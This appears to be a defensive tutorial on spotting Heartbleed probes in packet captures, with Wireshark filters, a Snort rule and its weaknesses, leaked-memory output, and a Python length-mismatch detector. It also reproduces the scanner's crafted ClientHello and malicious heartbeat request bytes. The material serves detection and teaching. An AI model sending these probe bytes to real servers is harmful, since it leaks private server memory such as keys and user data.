Network Detection of the Heartbleed Vulnerability

Network Capture and Detection

The Heartbleed vulnerability (CVE-2014-0160) is a missing bounds check in OpenSSL's handling of the TLS Heartbeat extension (RFC 6520): a Heartbeat Request that claims a larger payload than it actually carries makes the server reply with up to 64KB of its own process memory per request. In this demo, we probe a web server for the vulnerability and then capture the network packets. The capture is at:

https://dl.dropboxusercontent.com/u/40355863/heartbleed.zip

You can search for the Heartbeat Request with the Wireshark filter:

tcp matches "\x18\x03"

Here 0x18 is the TLS record content type for Heartbeat and 0x03 is the first byte of the protocol version. This is a raw byte match over the TCP payload, so it can also hit the same two bytes inside encrypted application data; the dissector field ssl.heartbeat_message (tls.heartbeat_message in newer Wireshark releases) only matches records Wireshark has actually decoded as heartbeats.

Figure 1: Heartbeat Request

If we follow the TCP stream, we see the leaked memory coming back. Much of it is the server's DER-encoded certificate (the subject name "ubuntu" and the UTCTime validity fields 140415192450Z and 240412192450Z are readable in the dump), followed by HTTP request headers left in the heap by an earlier client request:

...........SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............
...
.........3.2.....E.D...../...A.................................I.........
.4.2...
...........
...................................#...........B...>..SM..Z..@..%.4..b.....G.L..Okd..m....................#......................0...0.............j..p].0
..*.H..
.....0.1.0
..U....ubuntu0..
140415192450Z.
240412192450Z0.1.0
..U....ubuntu0.."0
..*.H..
..........0..
......K...7.....Z....bQ.u(5..I'.QJ.......x.!7*H"+.EG..>b.gD.._.....{.R+/...q}.....g...yE.<=q..(.r........\.iI>.....v.yv.+..F#..U....L..#D[..6...L.F@h..0....j.U..\D.J.....{ke...
..s.N......^e...+.DV..?..O.~4.......
or.#...-....6....&..{..Y|R.f.
$>.k....S....0.........
0.0...U....0.0
..*.H..
..........R_...;...d...?Q.V.).YI.....vY...2a4.;.ubF..4.....H....&..w....u...y".=.2g..o7..}..]0......y5H.F..
k.T.v@B5..9".3..../Gb...u.7wm.[.....{.
9.......H...m..Z N.e....m.....E...g..y).q.5`...E(..U>".)......Hw.........:.E.p........s..C.).E/O.r...KNoW..^..l..........K...G...A.%.?y....x.7..H.......B...F.B.....&....4(.L..=.....]2....=.b.n.;..."\.k.J.....M..g9...y%.....~..JOL..=.A...J7O.Q...\)6.P.@...p.....[...{.........XS....o..b..v....e.. ...x..w.|..t..e..hM....^.u.>
..X|..c_...h...kl..A....j..3G....=.8........#pG..S.....L...}..j->=m..p.9....../k...$........:
t.S..........L.......t..E.8..F0h.................@....@..@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............
...
.........3.2.....E.D...../...A.................................I.........
.4.2...
...........
...................................#.......-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-Modified-Since: Tue, 15 Apr 2014 19:24:48 GMT
If-None-Match: "b1-4f719c0d83492-gzip"

.....U. .[D.)K.....................................................................

Snort detection

The TLS Heartbeat Request record starts with the bytes 0x18 (content type: Heartbeat), 0x03 0x02 (protocol version TLS 1.1) and 0x00 (the high byte of the record length). With Snort, we can detect this pattern with a signature of:

alert tcp any any -> any 443 (msg:"Heartbeat request"; content:"|18 03 02 00|"; rawbytes; sid:100000;)

Two caveats apply to this rule. First, the version bytes 03 02 only match TLS 1.1 heartbeats: the scanner's TLS 1.0 probe (18 03 01 ..., shown below) passes it untouched, and a TLS 1.2 probe would carry 03 03. Second, it fires on any TLS 1.1 heartbeat shorter than 256 bytes, benign or malicious, because it never compares the claimed payload length with the record length, which is the property that actually defines Heartbleed. Adding depth:4; would at least anchor the match to the start of the packet payload rather than anywhere in the stream.

Next, running the vulnerability scan, we get an alert of:

[**] [1:100000:0] Heartbeat request [**]
[Priority: 0] 
04/16-13:03:11.524491 172.16.121.1:64670 -> 172.16.121.150:443
TCP TTL:64 TOS:0x0 ID:11426 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0xFBF142E1  Ack: 0x61B93B9D  Win: 0x2000  TcpLen: 32
TCP Options (3) => NOP NOP TS: 712292260 2460366
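As an added example (not part of the original post, and not code from the scanner whose packets are shown below), the following Python parses TLS records out of a TCP payload and checks the property that defines Heartbleed: a heartbeat whose 2-byte payload_length exceeds the bytes the record actually carries, for any TLS version rather than only the 03 02 bytes the Snort rule keys on. It also shows what that raw content match sees. The hbv10 and hbv11 bytes are the scanner's probes reproduced further down this page; the TLS 1.2 probe and the benign heartbeat are constructed for the demonstration, and the function names are my own.

```python
import binascii
import struct

# TLS record content type for Heartbeat and the two message types (RFC 6520)
TLS_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
TLS_VERSIONS = {0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}

# Byte pattern used by the Snort rule above: type 0x18, version 3.2, high length byte 0x00
SNORT_PATTERN = b"\x18\x03\x02\x00"


def h2bin(hexstr):
    """Hex string with spaces/newlines -> bytes (same role as the scanner's h2bin)."""
    return binascii.unhexlify("".join(hexstr.split()))


def iter_tls_records(payload):
    """Yield (content_type, version, body) for each TLS record in a TCP payload.

    Walks the 5-byte record headers in order and stops at the first header whose
    version is not a known TLS version rather than guessing at non-TLS data.
    """
    off = 0
    while off + 5 <= len(payload):
        ctype, version, length = struct.unpack("!BHH", payload[off:off + 5])
        if version not in TLS_VERSIONS:
            break
        body = payload[off + 5:off + 5 + length]  # shorter than length if truncated
        yield ctype, version, body
        off += 5 + length


def check_heartbeat(body):
    """Return a finding for one heartbeat record body, or None if it is well formed.

    Heartbleed is a length mismatch: payload_length claims more bytes than the
    record carries, and unpatched OpenSSL copies payload_length bytes from its own
    heap into the response. RFC 6520 also requires at least 16 bytes of padding,
    so any record shorter than 3 + payload_length + 16 bytes is invalid.
    """
    if len(body) < 3:
        return "truncated heartbeat record (%d bytes)" % len(body)
    hb_type, payload_length = struct.unpack("!BH", body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return "unknown heartbeat message type 0x%02x" % hb_type
    carried = len(body) - 3
    if payload_length > carried:
        return "Heartbleed: payload_length %d but only %d bytes carried" % (payload_length, carried)
    if carried - payload_length < 16:
        return "malformed heartbeat: padding of %d bytes is under the 16-byte minimum" % (carried - payload_length)
    return None


def detect_heartbleed(payload):
    """Scan one TCP payload and return [(tls_version, finding), ...] for bad heartbeats."""
    findings = []
    for ctype, version, body in iter_tls_records(payload):
        if ctype != TLS_HEARTBEAT:
            continue
        finding = check_heartbeat(body)
        if finding:
            findings.append((TLS_VERSIONS[version], finding))
    return findings


def snort_pattern_match(payload):
    """What the content:"|18 03 02 00|" rule sees: a raw byte match anywhere in the payload."""
    return SNORT_PATTERN in payload


def build_heartbeat(version, payload, padding=16):
    """Constructed sample: a well-formed HeartbeatRequest record for the given TLS version."""
    body = struct.pack("!BH", HB_REQUEST, len(payload)) + payload + b"\x00" * padding
    return struct.pack("!BHH", TLS_HEARTBEAT, version, len(body)) + body


# The scanner's two probes (see the crafted packets below) plus a constructed TLS 1.2
# variant with the same 3-byte body claiming a 16384-byte payload, and a benign request.
HBV10 = h2bin("18 03 01 00 03 01 40 00")
HBV11 = h2bin("18 03 02 00 03 01 40 00")
HBV12 = h2bin("18 03 03 00 03 01 40 00")
BENIGN = build_heartbeat(0x0302, b"ping")

if __name__ == "__main__":
    for name, pkt in (("hbv10", HBV10), ("hbv11", HBV11), ("hbv12", HBV12), ("benign", BENIGN)):
        print(name, "snort-pattern:", snort_pattern_match(pkt), "parser:", detect_heartbleed(pkt))
```

Running it shows the gap between the two approaches: the byte pattern fires on the benign TLS 1.1 heartbeat (its header is 18 03 02 00 17) and stays silent on hbv10 and the TLS 1.2 probe, while the length check flags all three probes and clears the benign record. The same check works on the server's response (type 0x02), which is how you would confirm on the wire that a host actually leaked memory rather than merely being probed.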

Detailed analysis

For a more detailed analysis, we look at the packets crafted by the scanning script. These are:

import binascii

def h2bin(x):
    # Strip the spaces and newlines from the hex dump and convert it to raw bytes
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))

# TLS record: type 0x16 (Handshake), version 03 02 (TLS 1.1), length 0x00dc (220 bytes);
# then a ClientHello (0x01, length 0x0000d8) with the cipher-suite list and, at the very
# end, the Heartbeat extension: type 00 0f, length 00 01, mode 01 (peer_allowed_to_send)
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Malicious Heartbeat Request for TLS 1.0: type 0x18 (Heartbeat), version 03 01,
# record length 00 03; then message type 01 (request) and a claimed payload_length
# of 0x4000 = 16384 bytes, although the record carries no payload at all
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')

# The same request with the TLS 1.1 version bytes 03 02
hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')

Thus we can search for the ClientHello (record header: Handshake, TLS 1.1, length under 256) using:

tcp matches "\x16\x03\x02\x00"

and for the heartbeat probes using the earlier "\x18\x03" filter. Following the stream then shows that the response is not encrypted (as shown in Figure 3). This is why the leak is visible to a network sensor at all: the scanner sends the Heartbeat Request as soon as the server's hello messages arrive, before the handshake completes and before any ChangeCipherSpec, so both the request and the roughly 16KB response travel as plaintext TLS records and the leaked memory can be read straight off the wire.

Figure 3: Non-encrypted response to Heartbeat Request
